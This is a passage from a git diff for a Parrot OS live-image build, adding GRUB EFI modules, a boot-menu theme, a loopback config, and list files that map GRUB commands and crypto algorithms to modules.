00000000..e9b58ec8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_pl2303.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_usbdebug.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_usbdebug.mod new file mode 100644 index 00000000..798d77c0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_usbdebug.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbtest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbtest.mod new file mode 100644 index 00000000..f1ba7af2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbtest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/verify.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/verify.mod new file mode 100644 index 00000000..b34437f5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/verify.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.lst new file mode 100644 index 00000000..ae9ba23e --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.lst @@ -0,0 +1,4 @@ +efi_gop +efi_uga +video_bochs +video_cirrus diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.mod new file mode 100644 index 00000000..46565851 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_bochs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_bochs.mod new file mode 100644 index 00000000..d9a70c2d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_bochs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_cirrus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_cirrus.mod new file mode 100644 index 00000000..6ef46a46 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_cirrus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_colors.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_colors.mod new file mode 100644 index 00000000..070b9663 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_colors.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_fb.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_fb.mod new file mode 100644 index 00000000..8c5e1a57 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/video_fb.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videoinfo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videoinfo.mod new file mode 100644 index 00000000..003fe5d7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videoinfo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest.mod new file mode 100644 index 00000000..41aa08eb Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest_checksum.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest_checksum.mod new file mode 100644 index 00000000..707fcd1d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/videotest_checksum.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xfs.mod new file mode 100644 index 00000000..a725f3d3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu.mod new file mode 100644 index 00000000..e74087be Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid.mod new file mode 100644 index 00000000..70c7a478 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid_test.mod new file mode 100644 index 00000000..f01872b1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xnu_uuid_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xzio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xzio.mod new file mode 100644 index 00000000..7e060195 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/xzio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/zfscrypt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/zfscrypt.mod new file mode 100644 index 00000000..056a6b81 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/zfscrypt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/live-theme/theme.txt b/modules/parrot-build/templates/common/includes.binary/boot/grub/live-theme/theme.txt new file mode 100644 index 00000000..f298c008 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/live-theme/theme.txt @@ -0,0 +1,63 @@ +desktop-image: "/isolinux/splash.png" +title-color: "#00BEFE" +title-font: "DejaVu Sans Bold 16" +title-text: "" +message-font: "Unifont Regular 16" +terminal-font: "Unifont Regular 16" + +#help bar at the bottom ++ label { + top = 100%-50 + left = 0 + width = 100% + height = 20 + text = "@KEYMAP_SHORT@" + align = "center" + color = "#00BEFE" + font = "DejaVu Sans Bold 14" +} + +# Title in the middle box ++ label { + top = 20% + left = 0 + width = 100% + height = 35 + align = "center" + color = "#00BEFE" + text = "ISO_TITLE - ISO_VERSION ISO_ARCH" + font = "DejaVu Sans Bold 16" +} + +#boot menu ++ boot_menu { + left = 13% + width = 74% + top = 20%+35 + height = 230 + item_color = "#a8a8a8" + item_font = "DejaVu Sans Bold 14" + selected_item_color= "#00BEFE" + selected_item_font = "DejaVu Sans Bold 14" + item_height = 16 + item_padding = 0 + item_spacing = 4 + icon_width = 0 + icon_heigh = 0 + item_icon_space = 0 +} + +#progress bar ++ progress_bar { + id = "__timeout__" + left = 13% + top = 100%-80 + height = 16 + width = 74% + font = "DejaVu Sans Bold 14" + text_color = "#000000" + fg_color = "#00BEFE" + bg_color = "#a8a8a8" + border_color = "#00BEFE" + text = "@TIMEOUT_NOTIFICATION_LONG@" +} diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/loopback.cfg b/modules/parrot-build/templates/common/includes.binary/boot/grub/loopback.cfg new file mode 100644 index 00000000..e94c44d2 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/loopback.cfg @@ -0,0 +1 @@ +source /boot/grub/grub.cfg diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/splash.png b/modules/parrot-build/templates/common/includes.binary/boot/grub/splash.png new file mode 100644 index 00000000..7a2e7414 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/splash.png differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/unicode.pf2 b/modules/parrot-build/templates/common/includes.binary/boot/grub/unicode.pf2 new file mode 100644 index 00000000..635e9cec Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/unicode.pf2 differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/acpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/acpi.mod new file mode 100644 index 00000000..531af70c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/acpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/adler32.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/adler32.mod new file mode 100644 index 00000000..107384f1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/adler32.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ahci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ahci.mod new file mode 100644 index 00000000..fc6e13a9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ahci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/all_video.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/all_video.mod new file mode 100644 index 00000000..100483fc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/all_video.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/aout.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/aout.mod new file mode 100644 index 00000000..f0d437b7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/aout.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/appleldr.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/appleldr.mod new file mode 100644 index 00000000..dddd9b6b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/appleldr.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/archelp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/archelp.mod new file mode 100644 index 00000000..d9f62c52 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/archelp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/at_keyboard.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/at_keyboard.mod new file mode 100644 index 00000000..13c51a18 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/at_keyboard.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ata.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ata.mod new file mode 100644 index 00000000..5e7638a7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ata.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/backtrace.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/backtrace.mod new file mode 100644 index 00000000..317091bf Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/backtrace.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bfs.mod new file mode 100644 index 00000000..27688efa Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap.mod new file mode 100644 index 00000000..a345af5e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap_scale.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap_scale.mod new file mode 100644 index 00000000..f28c72e5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bitmap_scale.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/blocklist.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/blocklist.mod new file mode 100644 index 00000000..d674d6b1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/blocklist.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/boot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/boot.mod new file mode 100644 index 00000000..b50031a5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/boot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bsd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bsd.mod new file mode 100644 index 00000000..c8c62084 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bsd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bswap_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bswap_test.mod new file mode 100644 index 00000000..25d9cf13 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bswap_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/btrfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/btrfs.mod new file mode 100644 index 00000000..ccfd41a1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/btrfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bufio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bufio.mod new file mode 100644 index 00000000..12713599 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/bufio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cat.mod new file mode 100644 index 00000000..a2f5fdd7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbfs.mod new file mode 100644 index 00000000..229b7bd3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbls.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbls.mod new file mode 100644 index 00000000..f40f5e3e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbls.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbmemc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbmemc.mod new file mode 100644 index 00000000..3c7ee9fb Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbmemc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtable.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtable.mod new file mode 100644 index 00000000..faf8c9f5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtable.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtime.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtime.mod new file mode 100644 index 00000000..f2214d90 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cbtime.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/chain.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/chain.mod new file mode 100644 index 00000000..507e06dd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/chain.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmdline_cat_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmdline_cat_test.mod new file mode 100644 index 00000000..3fa3772d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmdline_cat_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp.mod new file mode 100644 index 00000000..fc21ad8b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp_test.mod new file mode 100644 index 00000000..09c53648 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cmp_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/command.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/command.lst new file mode 100644 index 00000000..d7814a84 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/command.lst @@ -0,0 +1,190 @@ +*acpi: acpi +*all_functional_test: functional_test +*background_image: gfxterm_background +*cat: cat +*cpuid: cpuid +*crc: hashsum +*cryptomount: cryptodisk +*echo: echo +*extract_syslinux_entries_configfile: syslinuxcfg +*extract_syslinux_entries_source: syslinuxcfg +*file: file +*functional_test: functional_test +*gettext: gettext +*hashsum: hashsum +*hdparm: hdparm +*hello: hello +*help: help +*hexdump: hexdump +*inb: iorw +*inl: iorw +*inw: iorw +*keystatus: keystatus +*kfreebsd: bsd +*knetbsd: bsd +*kopenbsd: bsd +*list_env: loadenv +*load_env: loadenv +*loopback: loopback +*ls: ls +*lsacpi: lsacpi +*lspci: lspci +*md5sum: hashsum +*menuentry: normal +*pcidump: pcidump +*probe: probe +*read_byte: memrw +*read_dword: memrw +*read_word: memrw +*regexp: regexp +*save_env: loadenv +*search: search +*serial: serial +*setpci: setpci +*sha1sum: hashsum +*sha256sum: hashsum +*sha512sum: hashsum +*sleep: sleep +*submenu: normal +*syslinux_configfile: syslinuxcfg +*syslinux_source: syslinuxcfg +*terminfo: terminfo +*test_blockarg: test_blockarg +*testspeed: testspeed +*tr: tr +*trust: verify +*verify_detached: verify +*xnu_splash: xnu +*zfskey: zfscrypt +.: configfile +[: test +appleloader: appleldr +authenticate: normal +background_color: gfxterm_background +backtrace: backtrace +badram: mmap +blocklist: blocklist +boot: boot +break: normal +cat: minicmd +cbmemc: cbmemc +chainloader: chain +clear: normal +cmp: cmp +configfile: configfile +continue: normal +coreboot_boottime: cbtime +cutmem: mmap +date: date +distrust: verify +dump: minicmd +eval: eval +exit: minicmd +export: normal +extract_entries_configfile: configfile +extract_entries_source: configfile +extract_legacy_entries_configfile: legacycfg +extract_legacy_entries_source: legacycfg +fakebios: loadbios +false: true +fix_video: fixvideo +fwsetup: efifwsetup +gptsync: gptsync +halt: halt +help: minicmd +hexdump_random: random +initrd16: linux16 +initrd: linux +initrdefi: linuxefi +keymap: keylayouts +kfreebsd_loadenv: bsd +kfreebsd_module: bsd +kfreebsd_module_elf: bsd +knetbsd_module: bsd +knetbsd_module_elf: bsd +kopenbsd_ramdisk: bsd +legacy_check_password: legacycfg +legacy_configfile: legacycfg +legacy_initrd: legacycfg +legacy_initrd_nounzip: legacycfg +legacy_kernel: legacycfg +legacy_password: legacycfg +legacy_source: legacycfg +linux16: linux16 +linux: linux +linuxefi: linuxefi +list_trusted: verify +loadbios: loadbios +loadfont: font +lscoreboot: cbls +lsefi: lsefi +lsefimmap: lsefimmap +lsefisystab: lsefisystab +lsfonts: font +lsmmap: lsmmap +lsmod: minicmd +lssal: lssal +macppcbless: macbless +mactelbless: macbless +module2: multiboot2 +module: multiboot +multiboot2: multiboot2 +multiboot: multiboot +nativedisk: nativedisk +net_add_addr: net +net_add_dns: net +net_add_route: net +net_bootp6: net +net_bootp: net +net_del_addr: net +net_del_dns: net +net_del_route: net +net_get_dhcp_option: net +net_ipv6_autoconf: net +net_ls_addr: net +net_ls_cards: net +net_ls_dns: net +net_ls_routes: net +net_nslookup: net +normal: normal +normal_exit: normal +outb: iorw +outl: iorw +outw: iorw +parttool: parttool +password: password +password_pbkdf2: password_pbkdf2 +play: play +read: read +reboot: reboot +return: normal +rmmod: minicmd +search.file: search_fs_file +search.fs_label: search_label +search.fs_uuid: search_fs_uuid +setparams: normal +shift: normal +source: configfile +terminal_input: terminal +terminal_output: terminal +test: test +testload: testload +time: time +true: true +usb: usbtest +videoinfo: videoinfo +videotest: videotest +write_byte: memrw +write_dword: memrw +write_word: memrw +xnu_devprop_load: xnu +xnu_kernel64: xnu +xnu_kernel: xnu +xnu_kext: xnu +xnu_kextdir: xnu +xnu_mkext: xnu +xnu_ramdisk: xnu +xnu_resume: xnu +xnu_uuid: xnu_uuid +zfs-bootfs: zfsinfo +zfsinfo: zfsinfo diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio.mod new file mode 100644 index 00000000..8eb3ef27 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio_be.mod new file mode 100644 index 00000000..928825e1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpio_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpuid.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpuid.mod new file mode 100644 index 00000000..effabd1b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cpuid.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crc64.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crc64.mod new file mode 100644 index 00000000..63f69238 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crc64.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.lst new file mode 100644 index 00000000..77d9efc0 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.lst @@ -0,0 +1,45 @@ +RIJNDAEL: gcry_rijndael +RIJNDAEL192: gcry_rijndael +RIJNDAEL256: gcry_rijndael +AES128: gcry_rijndael +AES-128: gcry_rijndael +AES-192: gcry_rijndael +AES-256: gcry_rijndael +ADLER32: adler32 +CRC64: crc64 +ARCFOUR: gcry_arcfour +BLOWFISH: gcry_blowfish +CAMELLIA128: gcry_camellia +CAMELLIA192: gcry_camellia +CAMELLIA256: gcry_camellia +CAST5: gcry_cast5 +CRC32: gcry_crc +CRC32RFC1510: gcry_crc +CRC24RFC2440: gcry_crc +DES: gcry_des +3DES: gcry_des +DSA: gcry_dsa +IDEA: gcry_idea +MD4: gcry_md4 +MD5: gcry_md5 +RFC2268_40: gcry_rfc2268 +AES: gcry_rijndael +AES192: gcry_rijndael +AES256: gcry_rijndael +RIPEMD160: gcry_rmd160 +RSA: gcry_rsa +SEED: gcry_seed +SERPENT128: gcry_serpent +SERPENT192: gcry_serpent +SERPENT256: gcry_serpent +SHA1: gcry_sha1 +SHA224: gcry_sha256 +SHA256: gcry_sha256 +SHA512: gcry_sha512 +SHA384: gcry_sha512 +TIGER192: gcry_tiger +TIGER: gcry_tiger +TIGER2: gcry_tiger +TWOFISH: gcry_twofish +TWOFISH128: gcry_twofish +WHIRLPOOL: gcry_whirlpool diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.mod new file mode 100644 index 00000000..663c8246 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/crypto.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cryptodisk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cryptodisk.mod new file mode 100644 index 00000000..316a0fff Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cryptodisk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cs5536.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cs5536.mod new file mode 100644 index 00000000..05f54db9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/cs5536.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ctz_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ctz_test.mod new file mode 100644 index 00000000..4806997a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ctz_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/date.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/date.mod new file mode 100644 index 00000000..c37e4c55 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/date.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datehook.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datehook.mod new file mode 100644 index 00000000..0f69b279 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datehook.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datetime.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datetime.mod new file mode 100644 index 00000000..14fe14f1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/datetime.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/disk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/disk.mod new file mode 100644 index 00000000..eed4f2d7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/disk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/diskfilter.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/diskfilter.mod new file mode 100644 index 00000000..4945cc8a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/diskfilter.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div.mod new file mode 100644 index 00000000..78763676 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div_test.mod new file mode 100644 index 00000000..24cd5973 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/div_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/dm_nv.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/dm_nv.mod new file mode 100644 index 00000000..f3d6854b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/dm_nv.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/echo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/echo.mod new file mode 100644 index 00000000..a269e307 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/echo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_gop.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_gop.mod new file mode 100644 index 00000000..5509d267 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_gop.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_uga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_uga.mod new file mode 100644 index 00000000..55f8d222 Binary files /dev/null and 